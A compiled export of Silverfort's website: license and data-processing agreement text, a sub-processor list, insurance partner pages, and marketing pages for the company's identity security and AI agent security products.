Licensee shall not, directly or indirectly: (i) sell, lease, sublicense or distribute the SDA, or allow any third party to use the SDA, or any part thereof, in any manner; (ii) install or access the SDA, or any part thereof, on a server not owned by, under the control of and/or possession of Licensee or its Affiliates; (iii) reverse engineer, decompile, disassemble or otherwise reduce to human-perceivable form the SDA’s source code, or any part thereof; (iv) copy, modify, revise, enhance or alter the SDA, or any part thereof; (v) make the SDA, or any part thereof, accessible to other Licensees or the public; (vi) circumvent, disable or otherwise interfere with security-related features of the SDA, or any part thereof, or features that prevent or restrict use or copying of any content or that enforce limitations on use of the SDA, or any part thereof; (vii) interfere or attempt to interfere with the integrity or proper working of the SDA, or any part thereof; (viii) remove, alter or obscure any proprietary notice displayed on or via the SDA, or any part thereof; (ix) use the SDA, or any part thereof, to violate any applicable laws; (x) represent that it possesses any proprietary interest in the SDA, or any part thereof; (xi) publish or disclose to any third party any: reviews, testing results, information, or the results of any benchmark test of the SDA, or any part thereof, without Silverfort’s express prior written consent. The SDA is not for sale and is and shall remain Silverfort's exclusive property. All right, title and interest in and to the SDA, including any intellectual property rights therein and any and all improvements and derivative works thereof are and shall remain, as between the Parties, owned exclusively by Silverfort. Nothing herein constitutes a waiver of Silverfort's intellectual property rights under any applicable laws. 
Any data which is derived from the use of the SDA is owned by Silverfort and may be used, among other things, for maintaining, providing, updating, fixing and improving the SDA and any related services, for research and development purposes, and/or for statistical purposes.

If Silverfort receives any feedback regarding the SDA (“Feedback”), all Feedback, including all intellectual property rights therein, shall be provided on an “AS-IS” basis and without any warranty of any kind, shall be owned exclusively by Silverfort and shall be considered Silverfort's Confidential Information. Licensee hereby irrevocably and perpetually assigns to Silverfort all Feedback and all intellectual property rights therein and hereby waives any and all moral rights that Licensee may have in such Feedback.

Licensee and Silverfort shall not use any confidential, proprietary or other non-public information, including technical, marketing, financial, employee and planning information (hereinafter “Confidential Information”) of the other party for any purpose not expressly permitted hereunder, and shall disclose the Confidential Information only to such employees or contractors who have a need to know such Confidential Information, and who are under a duty of confidentiality no less restrictive than the Receiving Party’s duty hereunder. For clarity, Silverfort may use Licensee’s Confidential Information in order to comply with obligations under the Agreement as well as administering and operating the SDA. The receiving party shall protect the Confidential Information from unauthorized use, access or disclosure in the same or a similar manner as such party protects its own confidential or proprietary information of a similar nature, and in any event with no less than reasonable care.
Licensee represents and warrants that it owns, or has obtained the necessary rights, permissions and/or waivers, to install, use and/or access the SDA on the server on which the SDA is or will be installed, used, or accessed and in order to monitor and inspect the server. The SDA is provided on an “AS IS” and “As Available” basis without representations or warranties of any kind or nature, whether express, implied, statutory or otherwise. To the maximum extent permitted by applicable law, Silverfort specifically disclaims all implied warranties of merchantability, fitness for a particular purpose, title, non-infringement of third-party rights or arising from a course of dealing, usage or trade practice. To the extent any Licensee Data is made available to Silverfort, Licensee hereby grants Silverfort a non-exclusive, irrevocable, non-sublicensable, royalty-free, fully paid-up right and license to use such Licensee Data, in order to perform Silverfort’s obligations hereunder. In the event a data processing agreement is required under GDPR, the terms of the standard Data Processing Agreement available at https://www.silverfort.com/data-processing-agreement-june-2025/ (“DPA”) shall apply. The SDA and the output therefrom are intended for informational purposes only, and Licensee may not rely on the information from the SDA in determining whether to enter any further transaction to license Silverfort’s software or services. The recommendations and information from Silverfort and the SDA shall not be considered any warranty nor recommendation as to the proper future use, installation, nor functioning of Silverfort’s software or services. 
EXCEPT FOR ANY DAMAGES RESULTING FROM ANY BREACH OF EITHER PARTY’S CONFIDENTIALITY OBLIGATIONS HEREIN, AND/OR DAMAGES RESULTING FROM VIOLATION OF SILVERFORT’S INTELLECTUAL PROPERTY RIGHTS, TO THE EXTENT PERMITTED BY LAW, EITHER PARTY’S TOTAL AGGREGATE LIABILITY FOR ANY AND ALL DAMAGES AND LOSSES THAT ARISE UNDER OR IN CONNECTION WITH THIS AGREEMENT AND ANY ORDER FORM, OR THAT RESULT FROM USE OF OR INABILITY TO USE THE SDA, SHALL NOT IN ANY CIRCUMSTANCE EXCEED $1000. THIS LIMITATION OF LIABILITY IS CUMULATIVE AND NOT PER INCIDENT. --- - Published: 2025-07-15 - Modified: 2025-08-21 - URL: https://www.silverfort.com/data-processing-agreement-june-2025/ Last Updated – June 2025 This Data Processing Agreement (“DPA”) forms an integral part of the Silverfort Software License Agreement (“Agreement”) by and between the Client (“Client”) and the Silverfort entity noted in the Agreement (“Silverfort”). Both parties shall be referred to as the “Parties” and each, a “Party”. WHEREAS, Silverfort shall provide the Client with the Services as described in the Agreement. In the course of providing the Services pursuant to the Agreement, Silverfort may process Personal Data on Client's behalf; and WHEREAS, the Parties wish to set forth the arrangements concerning the processing of Personal Data (defined below) within the context of the Services and agree to comply with the following provisions with respect to any Personal Data, each acting reasonably and in good faith. NOW THEREFORE, in consideration of the mutual promises set forth herein and other good and valuable consideration, the receipt and sufficiency of which are hereby acknowledged by the Parties, the parties, intending to be legally bound, agree as follows: 1. INTERPRETATION AND DEFINITIONS 1. The headings contained in this DPA are for convenience only and shall not be interpreted to limit or otherwise affect the provisions of this DPA. 
1.1 References to clauses or sections are references to the clauses or sections of this DPA unless otherwise stated. 1.2 Words used in the singular include the plural and vice versa, as the context may require. 1.3 Capitalized terms not defined herein shall have the meanings assigned to such terms in the Agreement. 1.4 Definitions: (a) “Adequate Country” is a country that received an adequacy decision from the European Commission or other applicable data protection authority. The terms “Business”, “Business Purpose”, “Consumer”, “Controller”, “Data Subject”, “Personal Data”, “Personal Data Breach”, “Processing” (and “Process”), “Processor”, “Holder”, “Sensitive Data”, “Service Provider”, “Sale” (or “Sell”) and “Share”, “Special Categories of Personal Data”, “Sub-processor” and “Supervisory Authority”, shall all have the same meanings as ascribed to them under applicable Data Protection Laws. Further, under this DPA “Data Subject” shall also mean and refer to a “Consumer”; “Personal Data” shall also mean and refer to “Personal Information”; “Special Categories of Data” or “Highly Sensitive Data” shall also mean and refer to “Sensitive Data”; and “Data Processor” shall mean and refer to the Data Processor, the Service Provider or Third Party as applicable and the “Data Controller” shall mean and refer to the Business as well. (b) “Authorized Affiliate” means any of Client's Affiliate(s) which (a) is subject to the Data Protection Laws and Regulations and (b) is permitted to use the Services pursuant to the Agreement between Client and Silverfort, but has not signed its own agreement with Silverfort and is not a “Client” as defined under the Agreement. (c) “Client Data” means any Personal Data processed by Silverfort in the course of providing the Services. (d) “Data Privacy Framework” or “DPF” means the EU-U.S. Data Privacy Framework, Swiss-U.S. Data Privacy Framework and the UK Extension to the EU-U.S. Data Privacy Framework operated by the U.S. 
Department of Commerce; as may be amended, superseded or replaced. (e) “Data Privacy Framework Principles” means the Principles and Supplemental Principles contained in the relevant Data Privacy Framework available at: https://www.dataprivacyframework.gov/program-articles/Participation-Requirements-Data-Privacy-Framework-(DPF)-Principles; as may be amended, superseded or replaced. (f) “Data Protection Laws and Regulations” means any and all applicable privacy and data protection laws and regulations including, where applicable, European Data Protection Laws, Israeli Data Protection Laws and the US Data Protection Laws, as may be amended or superseded from time to time. (g) “European Data Protection Laws” means collectively, the laws and regulations of the European Union, the EEA, their Member States, and the United Kingdom, applicable to the Processing of Personal Data, including (where applicable): (i) EU General Data Protection Regulation (Regulation 2016/679) (“EU GDPR”); Regulation 2018/1725; and the e-Privacy Directive (Directive 2002/58/EC), as amended (“e-Privacy Law”); (ii) UK Data Protection Act 2018 (DPA 2018), as amended, and EU GDPR as incorporated into UK law as amended (“UK GDPR” and collectively with the EU GDPR shall be referred to herein as the “GDPR”); (iii) Swiss Federal Data Protection Act (dated June 19, 1992, as of March 1, 2019) and the Ordinance on the Federal Act on Data Protection; (iv) any national data protection laws made under, pursuant to, replacing or succeeding the EU GDPR or the e-Privacy Law; (v) any amendment or legislation replacing or updating any of the foregoing; and (vi) any judicial or administrative interpretation of any of the above, including any binding judicial or administrative interpretation of any of the above, or approved certification mechanisms issued by any relevant Supervisory Authority. 
(h) “Instructions” means the written, documented instructions issued by the Client to Silverfort directing Silverfort to perform a specific or general action with regard to Client Data (including, but not limited to, instructions to provide the Services under the Agreement and instructions under this DPA). (i) “Israeli Data Protection Laws” means, collectively, the: (i) Israeli Privacy Protection Law, 5741-1981 (as amended under Amendment 13); (ii) the regulations promulgated pursuant thereto, including the Israeli Privacy Protection Regulations (Data Security), 5777-2017 and the Israeli Protection of Privacy (Transfer of Data to Databases Abroad) Regulations, 5761-2001; (iii) any amendments or legislation replacing or updating any of the foregoing; and (iv) any judicial or administrative interpretation of any of the above, including any binding guidance, guidelines, codes of practice, approved codes of conduct or certification mechanisms approved by the Israeli Privacy Protection Authority. (j) “Member State” or “EEA” means the European Economic Area. “Union” means the European Union. (k) “Security Documentation” means the Security Documentation applicable to the specific Services purchased by Client, as updated from time to time, and will be made available to Client upon a request sent by Client to Silverfort at privacy@silverfort.com. (l) “Security Incident” means any accidental or unlawful destruction, loss, alteration, unauthorized disclosure of, or access to Client Data. Any Personal Data Breach will comprise a Security Incident. (m) “Silverfort” means the relevant Silverfort entity of the following Silverfort legal entities: Silverfort Inc., Silverfort Ltd., and any other wholly owned subsidiary of Silverfort, Inc. or Silverfort Ltd; and/or its Affiliates. 
(n) “Standard Contractual Clauses” or “SCCs” means (i) the standard contractual clauses for the transfer of Personal Data to third countries pursuant to Regulation (EU) 2016/679 of the European Parliament and of the Council adopted by the European Commission Decision 2021/914 of 4 June 2021, (ii) the UK “International Data Transfer Addendum to the European Commission Standard Contractual Clauses” (“UK SCC”); or (iii) the applicable standard data protection clauses issued, approved or recognized by the Swiss Federal Data Protection and Information Commissioner (“Swiss SCC”), all incorporated herein by reference. (o) “Supervisory Authority” means an independent public authority which is established by an EU Member State pursuant to the GDPR. (p) “US Data Protection Laws” means any U.S. federal and state privacy laws and regulations effective as of the Effective Date of this DPA that apply to Silverfort's Processing of Client Data, and any implementing regulations and amendments thereto, including without limitation, the California Consumer Privacy Act (Cal. Civ. Code §§ 1798.100 – 1798.199) of 2018 including as modified by the California Privacy Rights Act as well as all regulations promulgated thereunder from time to time (“CCPA”), the Colorado Privacy Act C.R.S.A. § 6-1-1301 et seq (SB 21-190) (“CPA”); the Connecticut Data Privacy Act, S.B. 6 (Connecticut 2022) (“CTDPA”); the Delaware Personal Data Privacy Act (“DPDPA”); the Iowa Data Privacy Law; the Florida Digital Bill of Rights S.B. 262 (“FDBR”); the Minnesota Consumer Data Privacy Act; the Montana Consumer Data Privacy Act 68th Legislature 2023, S.B. 0384 (“MTCDPA”); the Maryland Online Data Privacy Act; the Nebraska Data Privacy Act; the New Hampshire Privacy Act; the New Jersey Data Privacy Law; the Oregon Consumer Data Privacy Act ORS 646A.570-646A.589 (“OCDPA”); the Texas Data Privacy and Security Act, Tex. Bus. & Com. Code Ann. § 541.001 et seq (“TDPSA”); the Tennessee Information Protection Act (“TIPA”); the Utah Consumer Privacy Act, Utah Code Ann. § 13-61-101 et seq (“UCPA”); the Washington “My Health My Data” Act, Wash. Rev. Code § 19.373.005 et seq., and Nev. Rev. Stat. § 603A, as amended by Nevada S.B. 370 (together, the “Washington and Nevada Consumer Health Data Laws”); the Virginia Consumer Data Protection Act, Va. Code Ann. § 59.1-575 et seq. (SB 1392) (“VCDPA”). All as amended or superseded from time to time and including any implementing regulations and amendments thereto. Any other terms that are not defined herein shall have the meaning provided under the Agreement or applicable Data Protection Laws and Regulations. A reference to any term or section of the Data Protection Laws and Regulations means the version as amended. Any references to the GDPR in this DPA shall mean the GDPR or UK GDPR depending on the applicable Law. 2. PROCESSING OF PERSONAL DATA 2.1 Roles of the Parties. The Parties acknowledge and agree that with regard to the Processing of Personal Data under this DPA, Silverfort is the Data Processor and the Client is the Data Controller. For clarity, this DPA shall not apply with respect to Silverfort processing activity as a Data Controller. 2.2 Client’s Processing of Personal Data. Client shall, in its use of the Services, Process Personal Data in accordance with the requirements of Data Protection Laws and Regulations, comply at all times with the obligations applicable to data controllers and comply with any and all transparency-related obligations (including, without limitation, displaying any and all relevant and required privacy notices or policies) and shall at all times have any and all required ongoing legal bases in order to collect, Process and transfer to Silverfort the Personal Data and to authorize the Processing by Silverfort of the Personal Data which is authorized in this DPA. 
The Client shall be exclusively responsible to ensure its Instructions are compliant with applicable Data Protection Laws and enable a lawful Processing of Client Data. Client shall defend, hold harmless and indemnify Silverfort (including without limitation its directors, officers, agents, subcontractors and/or employees) from and against any liability of any kind related to any breach, violation or infringement by Client and/or its authorized users of any Data Protection Laws and Regulations and/or this DPA and/or this Section. 2.3 Silverfort’s Processing of Personal Data. 2.3.1 Subject to the Agreement, Silverfort shall Process Client Data only in accordance with Client’s instructions as necessary for the performance of the Services unless required otherwise by Union or Member State law or any other applicable law to which Silverfort and its Affiliates are subject; in which case, Silverfort shall inform the Client of the legal requirement before Processing, unless that law prohibits such information on important grounds of public interest. The duration of the Processing, the nature and purposes of the Processing, as well as the types of Personal Data Processed and categories of Data Subjects under this DPA are further specified in Schedule 1 (Details of the Processing) to this DPA. 
2.3.2 To the extent that Silverfort cannot comply with a request from Client relating to Processing of Client Data or where Silverfort considers such a request to be unlawful, Silverfort (i) shall inform Client, providing relevant details of the problem (but not legal advice), (ii) Silverfort may, without any kind of liability towards Client, temporarily cease all Processing of the affected Personal Data (other than securely storing those data), and (iii) if the Parties do not agree on a resolution to the issue in question and the costs thereof, each Party may, as its sole remedy, terminate the Agreement and this DPA with respect to the affected Processing, and Client shall pay to Silverfort all the amounts owed to Silverfort or due before the date of termination. Client will have no further claims against Silverfort (including, without limitation, requesting refunds for Services) due to the termination of the Agreement and/or the DPA in the situation described in this paragraph... --- - Published: 2025-07-10 - Modified: 2025-08-21 - URL: https://www.silverfort.com/silverfort-sub-processors-list/ July 2025 To support delivery of our services, Silverfort, Inc., Silverfort Ltd., Silverfort GmbH, and Silverfort Pte. Ltd. (“Silverfort”, “We”, “Our”) engage and use data processors with access to certain customer data (each, a “Subprocessor”). This page provides important information about the identity, location and role of each Subprocessor. 
| Entity name | Sub-processing activities | Hosting country |
| --- | --- | --- |
| Microsoft Corporation (Azure) | Cloud Infrastructure | Silverfort Unified Identity Protection SaaS: Clients from the USA: Admin Console - East-US; Auth-Service - East-US, West-US. Clients from the European Union & UK: Admin Console - Germany-West; Auth-Service - Germany-West, France-Central. Silverfort Messaging Services and MFA Forwarding (SaaS): Clients from the US, UK & Global: East-US, West Europe (Netherlands), UK-South. Clients from the European Union: Germany-West, France-Central. Clients from Asia and Australia: Southeast-Asia (Singapore), Australia-East |
| AWS | Cloud Infrastructure | Silverfort cloud identity platform: Frankfurt (Germany). Clients with FIDO2 authentication: Clients from the USA, UK & Global: Ireland; Clients from the European Union: Germany; Clients from Asia and Australia: Singapore |
| Appcues | Product Guidance | US |
| Coralogix | Log Management | Ireland |
| Google's Firebase (FCM) | Sending MFA to Mobile App (only relevant in the case that Silverfort Mobile app is used) | US |
| Snowflake, Inc. | Data Warehouse Services | Ireland |
| Beamer | Product Announcement | US |
| Heap | Product Analytics | US |

--- - Published: 2025-07-01 - Modified: 2025-08-01 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/beazley-security/ Silverfort's Cyber Insurance Ecosystem Beazley Security Beazley Security empowers clients with unparalleled cyber resilience, combining decades of technical expertise with the data-led approach of our parent company, global insurance provider Beazley Insurance. Our global team is committed to helping clients develop true cyber resilience; we excel in protection, detection, response, and recovery, ensuring you can withstand and recover from any cyberattack. How Silverfort and Beazley Security work together Beazley Security provides a range of managed security and risk management services, including Advisory consulting offerings and specialized services to secure Microsoft and cloud environments. 
By working closely with Silverfort, our teams deliver enhanced protections against identity-based attacks, focusing on AD hardening and leveraging Risk-based and Multi-factor authentication to improve secure access controls to reduce the risk of breach or loss. Beazley Security has operations in the US, Canada, UK, Germany, France, Spain, and Singapore. Exclusively for Beazley clients Get a free identity security assessment with Silverfort Silverfort’s free identity security assessment can help Beazley Security clients discover and resolve gaps in their MFA and privileged access protection and help to discover and secure service accounts. Get started Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-06-27 - Modified: 2025-07-30 - URL: https://www.silverfort.com/partners/partner-directory/ Partner directory Our partner network includes leading value-added distributors and resellers, advisory consultants, global system integrators, technology partners and more. Browse our partner directory here. --- - Published: 2025-06-19 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mtny2/ The identity security platform you deserve Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human, AI, or machine, cloud or on-prem. Get a demo or Take a platform tour Trusted by 1,000+ organizations around the world. Rated 4.8 on Gartner Peer Insights Where's the gap in your identity defense? Privileged Access Security Non-Human Identity Security Active Directory Service Account Security Extending Multi-Factor Authentication Authentication Firewall Identity Threat Detection and Response AI Agent Security The #1 attack surface Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. 
Too many systems and resources are left exposed and unprotected, creating countless security blind spots. Why Silverfort The Silverfort identity security platform Secure your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources—all the time. End-to-end Identity protection for on-prem, cloud, humans and machines. Protect the unprotectable Including systems that no other solution can cover. Zero changes To your systems, minimizing disruptions and cost. Discover the platform Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment." Tom Parker, VP of IT & CISO | Kayak "We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs." Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson "Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money." William Woo, Group CIO | Singtel “With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture.” Katie McMillan, Information Security Manager | Agilisys Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to take identity security further. 
The results speak for themselves. Hear from our customers Latest blogs Explore our blog The identity security platform you deserve Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human, AI, or machine, cloud or on-prem. Get a demo or Take a platform tour --- - Published: 2025-06-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/platform/ai-agent-security/ AI Agent Security Secure your AI agents. Innovate with speed and confidence. Securely adopt AI by governing, monitoring, and protecting your AI agents with the same rigor applied to human users. Protect AI from itself, from bad actors, and from insider threats. Get a demo Unlock AI agent potential, securely. Silverfort’s AI Agent Security extends identity-first protection to AI agents. Our inline architecture sits between AI agents and target systems via the MCP server, inspecting every request in real time for complete visibility and control. Human accountability for every AI agent Link all AI agent actions to the human they represent for accountability and auditability. Inline, real-time security controls Restrict over-privilege by dynamically granting access between AI agents and MCP servers. Protection against misuse and data leakage Stop AI agent overreach and make lateral movement and privilege escalation impossible. Learn more about our platform How it works Protect every agent, every action, and every connection point. Deploy without disruption. Deploy within days to get immediate protection of AI agent activity without slowing innovation or impacting your end users. Integrate MCP servers seamlessly with common enterprise services for instant visibility and control. Control all your AI agents and their usage of enterprise systems in one place. 
Get full visibility into every AI agent and MCP server in action in your environments, and manage all configurations, secrets, and policies from a single platform. Enforce least-privilege and dynamic access controls. Reduce the risk of unauthorized use—including lateral movement and privilege escalation—by enforcing precise, real-time access controls inline between agents and MCP servers. Want to adopt AI securely and accelerate innovation? We found a way. Set up a demo to see Silverfort's AI Agent Security in action. Learn more Explore blog --- - Published: 2025-06-18 - Modified: 2025-08-21 - URL: https://www.silverfort.com/mutiny-front-page-june-2025/ The identity security platform you deserve Never compromise. Identity security without limits. The identity infrastructure is siloed, but identity security doesn’t have to be. Discover and protect every dimension of identity, everywhere. Human or machine, cloud or on-prem. Get a demo or Take a platform tour Privileged Access Security Privileged Access Security (PAS) Go beyond managing privileged accounts NHI Security Non-Human Identity (NHI) Security Discover and protect non-human identities Universal MFA Universal MFA Extend multi-factor authentication to any system Authentication Firewall Authentication Firewall Stop unauthorized access with
Zero Trust policies ITDR Identity Threat Detection
& Response Detect and respond to attacks in real time ISPM Identity Security Posture Management Uncover, map and analyze identity security exposures AI Agent Security AI Agent Security Govern, monitor and protect your AI agents Proven technology Trusted by 1,000+ organizations. The #1 attack surface Identity is where your current security tools end and every attack begins. IAM security controls only work within their own silos, leaving critical gaps. Too many systems and resources are left exposed and unprotected, creating countless security blind spots. Why Silverfort The Silverfort identity security platform Secure your entire IAM infrastructure from within. We found a way to bring identity security to every corner of your environment. Our Runtime Access Protection (RAP) technology integrates seamlessly with your IAM infrastructure to protect all identities, all environments, and all resources—all the time. End-to-end Identity protection for on-prem, cloud, humans and machines. Protect the unprotectable Including systems that no other solution can cover. Zero changes To your systems, minimizing disruptions and cost. Discover the platform Where’s the gap in your identity defense? Privileged Access Security NHI Security Universal MFA Authentication Firewall ITDR ISPM AI Agent Security Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to take identity security further. The results speak for themselves. Hear from our customers Proven technology Trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. "Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment." Tom Parker, VP of IT & CISO | Kayak "We did a demo and POC—and our jaws dropped. 
We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs." Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson "Many large enterprises find it difficult to implement secure employee authentication across all their environments. Silverfort’s innovative solution simplifies this process without system modifications, saving time and money." William Woo, Group CIO | Singtel “With the help of Silverfort, we were able to fill a critical gap in our identity security, which was key for our overall security posture.” Katie McMillan, Information Security Manager | Agilisys Latest blogs Explore our blog --- - Published: 2025-06-09 - Modified: 2025-06-10 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/cyber-insurance-ecosystem-sudvers/ Silverfort's Cyber Insurance Ecosystem Südvers SÜDVERS is a multi-award-winning, internationally active insurance and risk expert for mid-sized companies and industry, offering tailored solutions for worldwide risk coverage. The owner-managed company has made it its mission to protect people and businesses. Using its own software applications, SÜDVERS runs systematic risk management and combines global solutions with local expertise. Learn more about cyber insurance compliance with Silverfort --- - Published: 2025-05-29 - Modified: 2025-08-21 - URL: https://www.silverfort.com/test-flight-world-tour-2025/ Test Flight World Tour 2025 Buckle up for the Silverfort Test Flight World Tour, a hands-on identity security experience like no other. Join us for live, complimentary sessions across the globe where you'll see what teams can achieve with identity security done right. Browse upcoming Test Flights How it works If you're an enterprise identity security professional, then Test Flight is for you. 
You should attend if: You manage identity management or security tools You have responsibility within the IAM strategy You're ready to learn about the Silverfort Identity Security Platform Browse upcoming Test Flights If you don't meet the above criteria but you're still keen to find out more about Silverfort, feel free to contact us here. Sample Agenda Get to know your hosts! Introductions with Silverfort and our in-region sponsor. Get hands-on with advanced security measures against identity-based threats. Hear from our customers or discover the latest innovations in identity security. Let's get lunch or catch up at happy hour! Browse our upcoming Test Flights Click on the location that suits you to find out more and request an invite. 
August 28th Melbourne, Australia Register now September 2nd Canberra, Australia Register now September 4th Cape Town, South Africa Sponsored by Register now September 10th Adelaide, Australia Register now September 25th Sydney, Australia Register now — More events coming soon — Past Test Flights Tampa, FL, United States Sponsored by Registration closed July 30th Pittsburgh, PA, United States Sponsored by Registration closed July 29th Lagos, Nigeria Sponsored by Registration closed July 17th Pretoria, South Africa Sponsored by Registration closed July 3rd | 9am – 1pm BST London, UK Cathedral View, St Vincent's Centre, SW1P 1NL Registration closed Don't see a Test Flight in your city? Join our mailing list to hear about upcoming Test Flights. Want to join us for a Test Flight? Browse our upcoming Test Flights above and hit "Request an invite" to let us know you'd like to attend. A member of our team will be in touch to confirm your space. Browse upcoming Test Flights --- - Published: 2025-05-29 - Modified: 2025-06-13 - URL: https://www.silverfort.com/ai-identity-security-design-partner/ Shape the future of AI agent security with Silverfort We're empowering CISOs to lead secure AI adoption by treating AI agents as identities—governed, visible, and protected with the same rigor applied to human users. Join the waitlist to build the future of AI agent security. Join the waitlist. 
Securing AI agents starts with treating them as an identity Our method for securing AI is built on a simple premise: AI agents must be treated as identities, and they should be tied to a person. Discover, classify, monitor Get full observability over all your AI agents based on their real-world behavior. Tie every action to a human Build accountability by connecting every agent to a responsible person. Get dynamic, least-privilege policies Tailor your access policies to each AI agent's role at scale. Become a pioneer in AI identity security If you’re leading AI adoption and need to secure it fast, we want to work with you. Become a design partner --- - Published: 2025-04-20 - Modified: 2025-05-13 - URL: https://www.silverfort.com/take-a-tour-pas-features/ Discover the identity security platform Take a tour of our Privileged Access Solution Explore the Silverfort Privileged Access Solution at your own pace. Discover how to: Discover all your privileged accounts. Apply virtual fencing to prevent privileged account abuse. Protect privileged accounts with Just in Time (JIT) access. Rated 4.8 on Gartner Peer Insights --- - Published: 2025-04-16 - Modified: 2025-08-01 - URL: https://www.silverfort.com/cyber-insurance-partner-ecosystem/arch-insurance/ Silverfort's Cyber Insurance Ecosystem Arch Insurance Arch is an S&P 500 company and leading diversified insurer and reinsurer, providing customised specialty risk solutions to clients worldwide across a wide range of industries. Pursuing Better Together® encapsulates how Arch always aspires to do business. 
From underwriting to handling claims, it’s an approach based on collaboration, responsiveness and a genuine commitment to continually raising the bar.
How Silverfort and Arch Insurance work together: Arch’s partnership with Silverfort demonstrates our commitment to delivering comprehensive cybersecurity solutions that help businesses stay protected in today’s complex and evolving threat landscape. By combining insurance coverage with cyber security expertise, we provide our clients with holistic protection and the tools to enhance their resilience against cyber attacks.
Exclusively for Arch insureds: get a free identity security assessment with Silverfort. Silverfort’s free identity security assessment can help Arch Insurance clients discover and resolve gaps in their MFA and privileged access protection, and help to discover and secure service accounts. Learn more about cyber insurance compliance with Silverfort.
---
- Published: 2025-03-26
- Modified: 2025-03-28
- URL: https://www.silverfort.com/take-a-tour-get-a-demo/
Take a tour: click below to launch an interactive tour. Get a demo: complete the form below to book a demo.
---
- Published: 2025-03-18
- Modified: 2025-08-21
- URL: https://www.silverfort.com/cloud-nhi-signup/
Your cloud NHI journey starts here. Extend your non-human identity security to the cloud with the new Silverfort solution! Discover NHIs such as service accounts, access keys, tokens, certificates, and more across cloud IdPs, cloud infrastructure, and SaaS applications. Detect over 48 types of cloud NHIs and gain insights into their effective privileges and activity patterns. Uncover ownership, expose dormant or unrotated credentials, and identify partially off-boarded identities to improve lifecycle management.
Only Silverfort provides end-to-end identity security for on-prem, cloud, humans and NHIs in a single platform. Protect both on-prem service accounts and cloud NHIs from a single platform, instead of relying on silos and point solutions.
- Complete visibility over every NHI: you can’t protect what you can’t see. Uncover your full inventory of NHIs. Map destinations, sources, privilege levels and security posture.
- Prioritize and mitigate the most critical exposures: minimize your attack surface and address the important compliance gaps in your environments.
- Remediate effectively to reduce risks: address security and lifecycle gaps by identifying account ownership and actionable recommendations.
---
- Published: 2025-03-11
- Modified: 2025-03-26
- URL: https://www.silverfort.com/take-a-tour-lp-paid/
Discover the identity security platform: take a tour of Silverfort. Explore the Silverfort Identity Security Platform at your own pace. Discover how to:
- Secure your entire IAM infrastructure from within.
- Discover and protect every dimension of identity, everywhere.
- Get maximum security with minimal effort.
Rated 4.8 on Gartner Peer Insights.
---
- Published: 2025-02-24
- Modified: 2025-02-26
- URL: https://www.silverfort.com/solutions-and-use-cases/
The identity security platform: your problems, our solutions. Finally, a complete identity security platform that covers all identities, all resources and all environments.
Use cases:
- Identity-first incident response: block lateral movement, detect and isolate compromised users, and accelerate recovery in Active Directory environments under attack – because in an incident, every second counts. It’s like having a firewall on your domain controllers.
- Service Account Protection: easily discover, classify, and secure your AD service accounts. Gain full visibility into their activities and enforce virtual fencing policies to secure them against compromise.
- Ransomware & Lateral Movement: defend against ransomware attacks and put a stop to lateral movement by detecting and blocking malicious authentications as they happen.
- Active Directory Protection: automatically discover all your users and service accounts and enforce identity access controls on every critical resource, from command-line access to file shares, legacy apps, IT infrastructure and many more.
- Cyber Insurance: meet and exceed the extended MFA requirements of cyber insurance policies with end-to-end identity security. Rapid implementation. Rapid compliance. Rapid return on investment.
- Regulatory Compliance: compliance with regulations and standards is critical to every organization. Meet the identity security requirements of key cybersecurity regulations with Silverfort’s MFA, PAM, and service account protection.
- Identity Zero Trust: bring zero trust to the identity control plane without any changes to the networking infrastructure with our unified, universal identity security.
- Secure Privileged Access: detecting and blocking malicious authentications as they happen is the only way to protect your environment against the lateral movement attacks that cut through endpoint and network defenses.
- OT Network Protection: enhance the resilience of your OT networks by securing their convergence interfaces with the IT network at layer 3.5 and securing engineer and service account access in the production zone.
Industries:
- Manufacturing: protect your industrial networks and overcome the risks of third-party access.
- Telecoms: mitigate the risk of malicious access across complex telecom environments.
- Retail: gain the upper hand against ransomware and lateral movement.
- Education: empower students and staff to access every resource securely and safely.
- Healthcare: safeguard patient information, mission-critical applications and other sensitive data.
- Finance: increase your resilience against identity threats across your entire hybrid environment.
---
- Published: 2025-02-21
- Modified: 2025-03-12
- URL: https://www.silverfort.com/take-a-tour/
Take a tour of the platform. Discover the Silverfort Identity Security Platform. Which identity security product would you like to explore? Privileged Access Security, NHI Security, Universal MFA, or Authentication Firewall. Rated 4.8 on Gartner Peer Insights.
Proven technology, trusted by 1,000+ organizations. Identity security is the heart of our mission. We build true partnerships with our customers to achieve it together. The results speak for themselves.
"We did a demo and POC—and our jaws dropped. We were left wondering where this has been all our lives. We knew we absolutely needed this to fit our identity security needs." Janusz Wreba-Jaworski, Cyber Security Manager | Womble Bond Dickinson
"Silverfort is able to protect what no one else can. There were no solutions that we looked at that were as comprehensive. Of the security tools that we use, Silverfort has a very high return on investment." Tom Parker, VP of IT & CISO | Kayak
